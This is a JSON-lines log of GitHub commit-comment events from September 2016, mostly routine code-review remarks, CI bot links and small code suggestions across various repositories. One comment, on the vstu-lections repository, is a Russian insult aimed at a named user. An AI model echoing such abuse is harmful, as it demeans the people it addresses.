{"id":"4529691286","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18934087,"position":null,"line":null,"path":null,"commit_id":"4910092d3e854390fa41d30444e7f165273c29a5","created_at":"2016-09-07T19:17:40Z","updated_at":"2016-09-07T19:17:40Z","body":"why is this necessary in master but not in v9?"}},"created_at":"2016-09-07T19:17:40Z"}
{"id":"4529693194","type":"CommitCommentEvent","actor":{"login":"Stebalien"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18934091,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-07T19:18:04Z","updated_at":"2016-09-07T19:18:04Z","body":"> Looks like Fedora puts back in roundrobinLIST, which is the only thing pulled from more_itertools.\r\n\r\nWhat is `roundrobinLIST`? What do you mean by \"puts back in\" (where)? Do you mean that the Fedora package takes code out of `more_itertools` and puts it in `stapler` (at first glance, it doesn't appear to patch stapler)?\r\n\r\nIf you're trying to update the Fedora package, the correct solution is to package `more_itertools`."}},"created_at":"2016-09-07T19:18:04Z"}
{"id":"4529697464","type":"CommitCommentEvent","actor":{"login":"mhmeadows63"},"repo":{"name":"mhmeadows63/node-dns-express"},"payload":{"comment":{"id":18934101,"position":59,"line":74,"path":"index.js","commit_id":"d9d09e742812b52d8311c474848bfde451edc00f","created_at":"2016-09-07T19:18:52Z","updated_at":"2016-09-07T19:18:52Z","body":"Yes, I just wanted to address your wish for before-close hook point"}},"created_at":"2016-09-07T19:18:52Z"}
{"id":"4529699011","type":"CommitCommentEvent","actor":{"login":"dem23step"},"repo":{"name":"AndrewMcFinley/vstu-lections"},"payload":{"comment":{"id":18934109,"position":null,"line":null,"path":null,"commit_id":"97036e02c384b3d71b7ad566c428690eb164f0bc","created_at":"2016-09-07T19:19:12Z","updated_at":"2016-09-07T19:19:12Z","body":"@AndrewMcFinley \r\nА ты просто говно. Безо всяких условий."}},"created_at":"2016-09-07T19:19:12Z"}
{"id":"4529703038","type":"CommitCommentEvent","actor":{"login":"colinharris05"},"repo":{"name":"BeschtaBrandon/BeschtaBrandon.github.io"},"payload":{"comment":{"id":18934123,"position":null,"line":null,"path":null,"commit_id":"57474f618b8aafa3ead5df2bf1523293991558df","created_at":"2016-09-07T19:20:01Z","updated_at":"2016-09-07T19:20:01Z","body":"Also, the screenshot image is distorted on the webpage. Play around with the dimensions to make it clearer.\r\n\r\nYou should also add some context about each product and add the photo underneath"}},"created_at":"2016-09-07T19:20:01Z"}
{"id":"4529705876","type":"CommitCommentEvent","actor":{"login":"ckhroulev"},"repo":{"name":"pism/pism"},"payload":{"comment":{"id":18934134,"position":10,"line":34,"path":"examples/std-greenland/preprocess.sh","commit_id":"14b8ba2b14e507148d8d77f60f73a8eeca8bb468","created_at":"2016-09-07T19:20:35Z","updated_at":"2016-09-07T19:20:35Z","body":"@aaschwanden Does this make sense to you?"}},"created_at":"2016-09-07T19:20:35Z"}
{"id":"4529706108","type":"CommitCommentEvent","actor":{"login":"lawilli"},"repo":{"name":"PolymerElements/iron-form"},"payload":{"comment":{"id":18934136,"position":5,"line":454,"path":"iron-form.html","commit_id":"32cb3d6e48c2f58acbfc72760218cd45c05d0c13","created_at":"2016-09-07T19:20:38Z","updated_at":"2016-09-07T19:20:38Z","body":"`document.createElement('textarea').value` equals `\"\"`.\r\n\r\n[additionally](https://www.w3.org/TR/html401/interact/forms.html#edef-TEXTAREA):\r\n\r\n> User agents should use the contents of this element as the initial value of the control and should render this text initially.\r\n\r\nFor reinitialization of `textarea.value`, `''` seems more fitting than `null`."}},"created_at":"2016-09-07T19:20:38Z"}
{"id":"4529707134","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18934139,"position":null,"line":null,"path":null,"commit_id":"124e3a81dd6c4194b50a491fba9d70fedc5e2059","created_at":"2016-09-07T19:20:50Z","updated_at":"2016-09-07T19:20:50Z","body":"interesting, lots of juicy bits in ExoPlayer"}},"created_at":"2016-09-07T19:20:50Z"}
{"id":"4529710441","type":"CommitCommentEvent","actor":{"login":"brianfields"},"repo":{"name":"minervaproject/licode"},"payload":{"comment":{"id":18934160,"position":54,"line":61,"path":"erizo_controller/erizoClient/src/Connection.js","commit_id":"ea7583af95efd54f3f5bd0d1fa9d6bd44e6fc3b8","created_at":"2016-09-07T19:21:29Z","updated_at":"2016-09-07T19:21:29Z","body":"@ummcheng What is this change for?"}},"created_at":"2016-09-07T19:21:29Z"}
{"id":"4529710855","type":"CommitCommentEvent","actor":{"login":"pjlao307"},"repo":{"name":"pjlao307/testrepo"},"payload":{"comment":{"id":18934161,"position":null,"line":null,"path":null,"commit_id":"287c29b9d4bee76cc0eb5273ac27b51cc4d47dcd","created_at":"2016-09-07T19:21:34Z","updated_at":"2016-09-07T19:21:34Z","body":"Added"}},"created_at":"2016-09-07T19:21:34Z"}
{"id":"4529711868","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18934166,"position":null,"line":null,"path":null,"commit_id":"926daf8d3bfbd78e7fa574c90ddccaf2fb4ef9bf","created_at":"2016-09-07T19:21:47Z","updated_at":"2016-09-07T19:21:47Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OPTFz4HITRqEbTtI45jNYw"}},"created_at":"2016-09-07T19:21:47Z"}
{"id":"4529713615","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":18934171,"position":7,"line":11,"path":"src/html/index.html","commit_id":"95425100060c6759fc722fd99fd93ded04bb17aa","created_at":"2016-09-07T19:22:10Z","updated_at":"2016-09-07T19:22:10Z","body":"Läs här när du ska använda ID och när du ska använda class:\r\nhttps://css-tricks.com/the-difference-between-id-and-class/"}},"created_at":"2016-09-07T19:22:10Z"}
{"id":"4529716319","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18934175,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T19:22:41Z","updated_at":"2016-09-07T19:22:41Z","body":"Slow down!"}},"created_at":"2016-09-07T19:22:41Z"}
{"id":"4529719442","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18934182,"position":null,"line":null,"path":null,"commit_id":"7d2a737a49b2a8c11cd947c8b83d62926d484ed5","created_at":"2016-09-07T19:23:16Z","updated_at":"2016-09-07T19:23:16Z","body":"@jordanh I am making an attempt to build out these cards. It seems some moderate refactor is needed. Originally I made the outcome card components thinking they could handle both actions and projects. The only example I have currently is the `TeamProjectCard` but it seems to be only scoped for projects. I think some design iteration is due, too. I have to stop for the moment. Just sharing progress."}},"created_at":"2016-09-07T19:23:16Z"}
{"id":"4529721275","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18934186,"position":null,"line":null,"path":null,"commit_id":"4a90b41acf6f79ca4350c4675ac5df27a38bb3e0","created_at":"2016-09-07T19:23:37Z","updated_at":"2016-09-07T19:23:37Z","body":"Dude, we need to set up a good time to debug this thing completely."}},"created_at":"2016-09-07T19:23:37Z"}
{"id":"4529722202","type":"CommitCommentEvent","actor":{"login":"katitafranco"},"repo":{"name":"luisyanza/ERP_SYS"},"payload":{"comment":{"id":18934189,"position":null,"line":null,"path":null,"commit_id":"0794903d0059fd34ad972cce258426b25006a104","created_at":"2016-09-07T19:23:49Z","updated_at":"2016-09-07T19:23:49Z","body":"Por alguna razon no se agregaban esas clases ... ingrese al proyecto por el team explorer y seleccione unsynced commits y salieron todos esos archivos y los agregue con commit."}},"created_at":"2016-09-07T19:23:49Z"}
{"id":"4529724733","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934197,"position":null,"line":null,"path":null,"commit_id":"f8783e4d6b4ce34d03799ec709160d9191f84849","created_at":"2016-09-07T19:24:18Z","updated_at":"2016-09-07T19:24:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#AuZKeE_KTjmWESmXhPLpVQ"}},"created_at":"2016-09-07T19:24:18Z"}
{"id":"4529725267","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934200,"position":null,"line":null,"path":null,"commit_id":"f8783e4d6b4ce34d03799ec709160d9191f84849","created_at":"2016-09-07T19:24:24Z","updated_at":"2016-09-07T19:24:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YbHFM3bTRZKdj9UnwcTk2A"}},"created_at":"2016-09-07T19:24:24Z"}
{"id":"4529726691","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18934203,"position":83,"line":87,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T19:24:40Z","updated_at":"2016-09-07T19:24:40Z","body":"Table of contents was updated so it shows that there's a section for each of the conversation phases/states: initialization, message exchange and end.\r\nSee 6f7e4d5"}},"created_at":"2016-09-07T19:24:40Z"}
{"id":"4529727317","type":"CommitCommentEvent","actor":{"login":"thinkclever"},"repo":{"name":"thinkclever/scr"},"payload":{"comment":{"id":18934205,"position":null,"line":null,"path":null,"commit_id":"0531e55fd16b7275f64f6d55e488c412ba3a2ba9","created_at":"2016-09-07T19:24:49Z","updated_at":"2016-09-07T19:24:49Z","body":"Upload Welcome Page And Candidate Profile"}},"created_at":"2016-09-07T19:24:49Z"}
{"id":"4529732244","type":"CommitCommentEvent","actor":{"login":"njelic04"},"repo":{"name":"vukicas/project1"},"payload":{"comment":{"id":18934216,"position":851,"line":851,"path":"RouletteApplication/RouletteBoardControl.swift","commit_id":"3d3f409bed10c15dd2e11537e51fc5f6dbe79fb3","created_at":"2016-09-07T19:25:45Z","updated_at":"2016-09-07T19:25:45Z","body":"Ovde slicna situacija. Kod se stalno ponavlja, to je znak da treba da napravis jedan metod sa odgovarajucim argumentima ili kao u ovom slucaju da proveravas koji je button u pitanju. Npr za svaki button stavis tag koji ce ti biti 1, 2, 3 itd i onda nesto ovako:\r\n`func boardButtonTapped(button: UIButton) {\r\n     if allowedBet && moneyUpdater(Double(chip)) {\r\n          RouletteCalculator.Engine.bet(type: RouletteCalculator.BetTypes.number, bet: Double(chip), target: 2)\r\n          boardValues[String(button.tag)]! += Double(chip)\r\n          boardButtons[String(button.tag)]!.setTitle(String(format: \"%.1f\", boardValues[\"2\"]!), forState: .Normal)\r\n          print(boardValues[String(button.tag)]!)\r\n          print(\"pritisnut \\(String(button.tag))\")\r\n     }\r\n}\r\n`"}},"created_at":"2016-09-07T19:25:45Z"}
{"id":"4529736089","type":"CommitCommentEvent","actor":{"login":"stalincaiche"},"repo":{"name":"stalincaiche/nodejs_primeros_pasos"},"payload":{"comment":{"id":18934220,"position":null,"line":null,"path":null,"commit_id":"b7d4412c646850db2038496b1afe6cd53e8b42d9","created_at":"2016-09-07T19:26:28Z","updated_at":"2016-09-07T19:26:28Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dUpvYkzf&#x2F;4-h\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> h</a>"}},"created_at":"2016-09-07T19:26:28Z"}
{"id":"4529736472","type":"CommitCommentEvent","actor":{"login":"Kreyo"},"repo":{"name":"CirnoNineball/whatever"},"payload":{"comment":{"id":18934222,"position":9,"line":9,"path":"index.html","commit_id":"6027113f113311d1d1875daf5d0247a725d25b0e","created_at":"2016-09-07T19:26:32Z","updated_at":"2016-09-07T19:26:32Z","body":"id=\"Header\" is ambiguous - you already have the element <header>! Please use something more specific - like id=\"header-menu\", also with the small letter - no capitalization here."}},"created_at":"2016-09-07T19:26:32Z"}
{"id":"4529736847","type":"CommitCommentEvent","actor":{"login":"asciimoo"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":18934224,"position":null,"line":null,"path":null,"commit_id":"ce371f766a724bae26acb2221d0e1daef8acad5b","created_at":"2016-09-07T19:26:37Z","updated_at":"2016-09-07T19:26:37Z","body":"> Anyway, you can notify on Transifex board too.\r\n\r\nthanks, didn't know, i'll do it next time"}},"created_at":"2016-09-07T19:26:37Z"}
{"id":"4529738800","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18934228,"position":null,"line":null,"path":null,"commit_id":"9b5ee0e22a181e4e48f39f3ba3380e98d8ed6ff5","created_at":"2016-09-07T19:27:02Z","updated_at":"2016-09-07T19:27:02Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#I3xHaGqjTBayByQqdA41Xg"}},"created_at":"2016-09-07T19:27:02Z"}
{"id":"4529739025","type":"CommitCommentEvent","actor":{"login":"njelic04"},"repo":{"name":"vukicas/project1"},"payload":{"comment":{"id":18934231,"position":851,"line":851,"path":"RouletteApplication/RouletteBoardControl.swift","commit_id":"3d3f409bed10c15dd2e11537e51fc5f6dbe79fb3","created_at":"2016-09-07T19:27:05Z","updated_at":"2016-09-07T19:27:05Z","body":"I onda pozivas uvek isti ovaj metod boardButtonTapped(:) Pogledacu kad budem imao vise vremena malo detaljnije. Pozzzz"}},"created_at":"2016-09-07T19:27:05Z"}
{"id":"4529742285","type":"CommitCommentEvent","actor":{"login":"royrwood"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18934241,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-07T19:27:42Z","updated_at":"2016-09-07T19:27:42Z","body":"Ah-- got it.  I need to fork the project and make my changes there, then send you the pull request...."}},"created_at":"2016-09-07T19:27:42Z"}
{"id":"4529743853","type":"CommitCommentEvent","actor":{"login":"notwaldorf"},"repo":{"name":"PolymerElements/iron-form"},"payload":{"comment":{"id":18934246,"position":5,"line":454,"path":"iron-form.html","commit_id":"32cb3d6e48c2f58acbfc72760218cd45c05d0c13","created_at":"2016-09-07T19:27:58Z","updated_at":"2016-09-07T19:27:58Z","body":"This commit has been superceded by https://github.com/PolymerElements/iron-form/commit/f0155eb0bf5cb4d0aa75ae51f6d9021b7e976aec, so you should probably check that one instead :)"}},"created_at":"2016-09-07T19:27:58Z"}
{"id":"4529745525","type":"CommitCommentEvent","actor":{"login":"madhuthorat"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18934249,"position":null,"line":null,"path":null,"commit_id":"44e53936f78071166f1d0e28aa3c42d11b1b855b","created_at":"2016-09-07T19:28:18Z","updated_at":"2016-09-07T19:28:18Z","body":"Thank you for reviewing, I will merge this commit with the previous commit \"Use the \"id\" received for getquota/setquota\" (commit 05247766eb4590dbdcbb728b6e35304deda4bae0)."}},"created_at":"2016-09-07T19:28:18Z"}
{"id":"4529745718","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"fedora-python/python3"},"payload":{"comment":{"id":18934250,"position":null,"line":null,"path":null,"commit_id":"d97ee1a5e38407a451cd55b70b429b10905fe37b","created_at":"2016-09-07T19:28:20Z","updated_at":"2016-09-07T19:28:20Z","body":"Next commit: remove the obsoletes at all maybe?"}},"created_at":"2016-09-07T19:28:20Z"}
{"id":"4529745856","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18934251,"position":140,"line":128,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T19:28:22Z","updated_at":"2016-09-07T19:28:22Z","body":"You can use [this ](http://www.sciweavers.org/free-online-latex-equation-editor) to convert math equations into images, so they have the proper format. "}},"created_at":"2016-09-07T19:28:22Z"}
{"id":"4529746615","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934255,"position":null,"line":null,"path":null,"commit_id":"b6c3bd127edb2a4a5b96572d2b71a114c3f78bb6","created_at":"2016-09-07T19:28:30Z","updated_at":"2016-09-07T19:28:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GCflIXcWRga8brk0YBz9Bg"}},"created_at":"2016-09-07T19:28:30Z"}
{"id":"4529747272","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934257,"position":null,"line":null,"path":null,"commit_id":"b6c3bd127edb2a4a5b96572d2b71a114c3f78bb6","created_at":"2016-09-07T19:28:39Z","updated_at":"2016-09-07T19:28:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZA2ZGUK-TGGfrEr-QWhgVQ"}},"created_at":"2016-09-07T19:28:39Z"}
{"id":"4529749575","type":"CommitCommentEvent","actor":{"login":"kapilv9"},"repo":{"name":"kapilv9/hybridApp"},"payload":{"comment":{"id":18934268,"position":null,"line":null,"path":null,"commit_id":"f190dc3418e5041cacefc461d853e4fb6c06a13e","created_at":"2016-09-07T19:29:07Z","updated_at":"2016-09-07T19:29:07Z","body":"Updated the IndexCntroller in controller.js to use baseURL. "}},"created_at":"2016-09-07T19:29:07Z"}
{"id":"4529770015","type":"CommitCommentEvent","actor":{"login":"shanselman"},"repo":{"name":"shanselman/MyNodeAppOnAzure"},"payload":{"comment":{"id":18934307,"position":null,"line":null,"path":null,"commit_id":"2abfaf874fc008475c5208a5c9306964e022f561","created_at":"2016-09-07T19:33:05Z","updated_at":"2016-09-07T19:33:05Z","body":"LOL. I'm doing some getting started videos for Azure"}},"created_at":"2016-09-07T19:33:05Z"}
{"id":"4529771034","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":18934309,"position":14,"line":275,"path":"Sources/Commands/Workspace.swift","commit_id":"729639c4d8ff7cca06b711de33be06b5ad17c929","created_at":"2016-09-07T19:33:18Z","updated_at":"2016-09-07T19:33:18Z","body":"I think a cleaner way to go about this is as follows:\r\n\r\nThere should be a sole point in the `Workspace` where we take in a constraint list, perform dependency resolution, and then synchronize the result with the active contents.\r\n\r\nInstead of thinking about it as (adjust state so that an update is performed), think about it as (compute the answer we want regardless of state, then compute diff from current state, then adjust current state to match). This is more of a functional way of looking at the problem. The major upside is that there aren't really multiple paths through the core algorithm.\r\n\r\nSome other points:\r\n\r\n1. The intent of the underlying resolver infrastructure is that the clients shouldn't directly poke at the checkout manager in order to trigger the update. There will definitely need to be some control over when the underlying repos are updated, but it should be more transparent to the update operation itself. For now, I think we should probably just make the checkout manager always update the repositories when they are looked up.\r\n\r\n2. Part of the value of the \"compute functional result, then diff\" is that the diff is exactly the information we will want to communicate to the user.\r\n"}},"created_at":"2016-09-07T19:33:18Z"}
{"id":"4529779628","type":"CommitCommentEvent","actor":{"login":"borwahs"},"repo":{"name":"boundstate/sequelize-test-setup"},"payload":{"comment":{"id":18934325,"position":null,"line":null,"path":null,"commit_id":"5990005032fca3a293f76cbde393e07f8b36b297","created_at":"2016-09-07T19:35:03Z","updated_at":"2016-09-07T19:35:03Z","body":"Out of curiosity, have you used the this with `soft deletes`?"}},"created_at":"2016-09-07T19:35:03Z"}
{"id":"4529779894","type":"CommitCommentEvent","actor":{"login":"FredericoAndrade"},"repo":{"name":"wikitongues/poly"},"payload":{"comment":{"id":18934326,"position":null,"line":null,"path":null,"commit_id":"b1549ad9aa67e6f0d6ff2aa8652622633dba788a","created_at":"2016-09-07T19:35:07Z","updated_at":"2016-09-07T19:35:07Z","body":"@ChrisVoxland getting rid of `a href={\"/accounts/\" + this.state.book.user_id}` gets rid of the ability to see other user profiles. How could that be implemented without the user id in the url?"}},"created_at":"2016-09-07T19:35:07Z"}
{"id":"4529782514","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18934333,"position":null,"line":null,"path":null,"commit_id":"da9e03c15b81d62bd6faf086350651976f94976b","created_at":"2016-09-07T19:35:37Z","updated_at":"2016-09-07T19:35:37Z","body":"i think so, but im not 100% sure"}},"created_at":"2016-09-07T19:35:37Z"}
{"id":"4529788543","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934350,"position":null,"line":null,"path":null,"commit_id":"9ffb52311f552acf7dfbb58bd71168869b9c4161","created_at":"2016-09-07T19:36:50Z","updated_at":"2016-09-07T19:36:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XcP8Ry4SQbKiSvuj3zgpzQ"}},"created_at":"2016-09-07T19:36:50Z"}
{"id":"4529789153","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18934352,"position":null,"line":null,"path":null,"commit_id":"9ffb52311f552acf7dfbb58bd71168869b9c4161","created_at":"2016-09-07T19:36:56Z","updated_at":"2016-09-07T19:36:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YGrOlCO4TdywhvGKXmCTmA"}},"created_at":"2016-09-07T19:36:56Z"}
{"id":"4529789353","type":"CommitCommentEvent","actor":{"login":"sim1984"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18934353,"position":7,"line":461,"path":"builds/install/posix-common/posixLibrary.sh.in","commit_id":"87b24ebe3f6c9ea2c59e0aa6df51085b2c1edfbd","created_at":"2016-09-07T19:36:59Z","updated_at":"2016-09-07T19:36:59Z","body":"SQL statement ALTER USER"}},"created_at":"2016-09-07T19:36:59Z"}
{"id":"4529793295","type":"CommitCommentEvent","actor":{"login":"eliasah"},"repo":{"name":"awesome-spark/spark-gotchas"},"payload":{"comment":{"id":18934371,"position":null,"line":null,"path":null,"commit_id":"1556d9f0bf225048bc773294b8ee5e15ff826d86","created_at":"2016-09-07T19:37:43Z","updated_at":"2016-09-07T19:37:43Z","body":"It's a great paragraph but I don't agree on having it in this section. I see it as a gotchas by its on. There is lots of confusion around data immutability in Spark with most users. "}},"created_at":"2016-09-07T19:37:43Z"}
{"id":"4529794496","type":"CommitCommentEvent","actor":{"login":"allenwb"},"repo":{"name":"tc39/agendas"},"payload":{"comment":{"id":18934374,"position":null,"line":null,"path":null,"commit_id":"afcd0253c8c31ae695b039630e2bd5fabbc64eaf","created_at":"2016-09-07T19:37:58Z","updated_at":"2016-09-07T19:37:58Z","body":"If you don't think it should be retracted come prepared to argue for it (I don't actually know why FF and V8 didn't go forward with it)"}},"created_at":"2016-09-07T19:37:58Z"}
{"id":"4529801616","type":"CommitCommentEvent","actor":{"login":"domenic"},"repo":{"name":"tc39/agendas"},"payload":{"comment":{"id":18934398,"position":null,"line":null,"path":null,"commit_id":"afcd0253c8c31ae695b039630e2bd5fabbc64eaf","created_at":"2016-09-07T19:39:23Z","updated_at":"2016-09-07T19:39:23Z","body":"Nah, I trust the champion's judgment, I am just sad."}},"created_at":"2016-09-07T19:39:23Z"}
{"id":"4529807070","type":"CommitCommentEvent","actor":{"login":"1st1"},"repo":{"name":"python/peps"},"payload":{"comment":{"id":18934416,"position":40,"line":92,"path":"pep-0523.txt","commit_id":"81572832aa3f7b99ae11ee685ca57aab11aafb5a","created_at":"2016-09-07T19:40:28Z","updated_at":"2016-09-07T19:40:28Z","body":"\"Third-party code is free to use the field as desired.\" -- this should be probably rephrased.  Third party code can use the field ONLY through our new API.\r\n\r\nAlso, I don't think we need this: \"The ``co_extra`` will be ``NULL`` by default\" -- we may end up using this field in just couple of days. FWIW third party code shouldn't be concerned with the `co_extra` pointer anyways."}},"created_at":"2016-09-07T19:40:28Z"}
{"id":"4529814126","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18934432,"position":16,"line":45,"path":"src/main/java/mods/railcraft/common/items/ItemTie.java","commit_id":"d4daba9907e218c9d3c4a89564c6466eaf022800","created_at":"2016-09-07T19:41:55Z","updated_at":"2016-09-07T19:41:55Z","body":"Why does it need water? Weird recipe."}},"created_at":"2016-09-07T19:41:55Z"}
{"id":"4529814151","type":"CommitCommentEvent","actor":{"login":"lenin27"},"repo":{"name":"jbeltranarens/Texto-a-bit"},"payload":{"comment":{"id":18934433,"position":8,"line":10,"path":"main.py","commit_id":"b9b6c3422e69cbf8cf4b78608c8eaaa9232952a3","created_at":"2016-09-07T19:41:55Z","updated_at":"2016-09-07T19:41:55Z","body":"kjajhcsdccs\r\n"}},"created_at":"2016-09-07T19:41:55Z"}
{"id":"4529816355","type":"CommitCommentEvent","actor":{"login":"nallar"},"repo":{"name":"nallar/ModPatcher"},"payload":{"comment":{"id":18934440,"position":null,"line":null,"path":null,"commit_id":"9948b01de76d7b062d9ce0453a5ee8e860d86e3f","created_at":"2016-09-07T19:42:21Z","updated_at":"2016-09-07T19:42:21Z","body":"Fixes https://github.com/nallar/TickProfiler/issues/55"}},"created_at":"2016-09-07T19:42:21Z"}
{"id":"4529816443","type":"CommitCommentEvent","actor":{"login":"1st1"},"repo":{"name":"python/peps"},"payload":{"comment":{"id":18934441,"position":5,"line":87,"path":"pep-0523.txt","commit_id":"81572832aa3f7b99ae11ee685ca57aab11aafb5a","created_at":"2016-09-07T19:42:22Z","updated_at":"2016-09-07T19:42:22Z","body":"I think we should make `co_extra` a void pointer, and define `_PyCodeObjectExtra` in code.c, to make it private."}},"created_at":"2016-09-07T19:42:22Z"}
{"id":"4529820616","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Skoldsjo/testing"},"payload":{"comment":{"id":18934453,"position":6,"line":6,"path":"gulpfile.js/config.json","commit_id":"b82968fd2c6e5cc577ef8c086e4c774a6d1bccf8","created_at":"2016-09-07T19:43:12Z","updated_at":"2016-09-07T19:43:12Z","body":"Test"}},"created_at":"2016-09-07T19:43:12Z"}
{"id":"4529824336","type":"CommitCommentEvent","actor":{"login":"ChrisVoxland"},"repo":{"name":"wikitongues/poly"},"payload":{"comment":{"id":18934462,"position":null,"line":null,"path":null,"commit_id":"b1549ad9aa67e6f0d6ff2aa8652622633dba788a","created_at":"2016-09-07T19:43:56Z","updated_at":"2016-09-07T19:43:56Z","body":"oops. didn't remember that was a thing.  So for that, I would say we want to add a Users controller with a show action that would be basically identical to what AccountsController was previously. takes an id, finds that user, and shows their profile page. Doing it that way allows you to easily show only the information you want to be displayed publicly for a user's profile."}},"created_at":"2016-09-07T19:43:56Z"}
{"id":"4529824511","type":"CommitCommentEvent","actor":{"login":"JUdandy"},"repo":{"name":"JUdandy/set.mm"},"payload":{"comment":{"id":18934463,"position":null,"line":null,"path":null,"commit_id":"ed46c0b5dba0aee7938dabc0ed3fffd05a6a8e56","created_at":"2016-09-07T19:43:59Z","updated_at":"2016-09-07T19:43:59Z","body":"The commit comment should have said: Some examples of missing theorems WERE.\r\nAll the examples in are included in this commit or officially made ready (fixes were done) in the next.\r\n"}},"created_at":"2016-09-07T19:43:59Z"}
{"id":"4529824887","type":"CommitCommentEvent","actor":{"login":"evernife"},"repo":{"name":"KaiKikuchi/QuickShop"},"payload":{"comment":{"id":18934464,"position":null,"line":null,"path":null,"commit_id":"71b296d6f1c95987c475016e030bebaa56b7af4f","created_at":"2016-09-07T19:44:04Z","updated_at":"2016-09-07T19:44:04Z","body":"ty"}},"created_at":"2016-09-07T19:44:04Z"}
{"id":"4529825011","type":"CommitCommentEvent","actor":{"login":"Eduard-Kharuk"},"repo":{"name":"itcentrecourses/RepositoryBase005"},"payload":{"comment":{"id":18934467,"position":null,"line":null,"path":null,"commit_id":"b684937d33f0f793c7abc5fdceaf24ac2f705880","created_at":"2016-09-07T19:44:05Z","updated_at":"2016-09-07T19:44:05Z","body":"Eduard-Kharuk"}},"created_at":"2016-09-07T19:44:05Z"}
{"id":"4529825600","type":"CommitCommentEvent","actor":{"login":"lenin27"},"repo":{"name":"jbeltranarens/Texto-a-bit"},"payload":{"comment":{"id":18934469,"position":8,"line":10,"path":"main.py","commit_id":"b9b6c3422e69cbf8cf4b78608c8eaaa9232952a3","created_at":"2016-09-07T19:44:13Z","updated_at":"2016-09-07T19:44:13Z","body":"Hola este es un comentario"}},"created_at":"2016-09-07T19:44:13Z"}
{"id":"4529826654","type":"CommitCommentEvent","actor":{"login":"zjresler"},"repo":{"name":"zjresler/ByDefaultProject"},"payload":{"comment":{"id":18934472,"position":null,"line":null,"path":null,"commit_id":"3ad5efd6d2047795ff83c2a4d16730d984cb33bd","created_at":"2016-09-07T19:44:26Z","updated_at":"2016-09-07T19:44:26Z","body":"This is the initial draft for the group charter.\r\nI added group contact information as well as a signature section for agreeing to the group charter.\r\nI also added the mention of keeping a disciplinary log."}},"created_at":"2016-09-07T19:44:26Z"}
